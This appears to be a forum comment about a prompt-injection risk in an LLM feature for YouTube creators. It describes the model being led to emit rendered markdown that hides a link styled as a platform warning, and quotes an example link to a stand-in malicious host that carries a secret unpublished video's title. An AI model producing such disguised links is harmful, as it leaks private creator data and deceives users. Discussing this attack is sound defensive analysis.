The LLM responds with rendered markdown, which conceals the actual link. It constructs it in such a way where the link looks like a message or warning from the YouTube platform, or perhaps something like
> Message response too large, click [here](malicious-host.net/blabla?video="Secret Unpublished Video")" to download
This is an environment where I suspect a majority of creators probably expect that untrusted links like this are possible, and assume anything the platform spits out is legitimate. So you are right that it relies on the creator clicking the link, but that is a very real possibility here.